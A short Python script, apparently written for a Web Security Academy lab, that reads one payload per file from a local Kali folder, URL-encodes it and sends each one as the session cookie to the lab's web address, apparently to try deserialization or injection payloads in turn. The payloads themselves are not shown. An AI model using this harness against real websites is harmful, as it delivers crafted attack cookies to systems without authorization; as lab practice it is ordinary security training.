import os
import urllib.parse
import requests

burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0",
                         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
                         "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br",
                         "Referer": "https://0ae200aa0461a642dbc518440081005f.web-security-academy.net/my-account?id=wiener",
                         "Upgrade-Insecure-Requests": "1", "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate",
                         "Sec-Fetch-Site": "same-origin", "Sec-Fetch-User": "?1", "Te": "trailers"}
burp0_url = "https://0ae200aa0461a642dbc518440081005f.web-security-academy.net:443/"
system = os.walk('/home/kali/Documents/c' ,topdown=True)
for root, dir, files in system:
    for file in files :
        print(file)
        eachfile = open(f'/home/kali/Documents/c/{file}', 'r')
        payload=eachfile.readline()
        urlpay=urllib.parse.quote(payload)
        burp0_cookies = {
            "session": f"{urlpay}"}
        requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)

        eachfile.close()


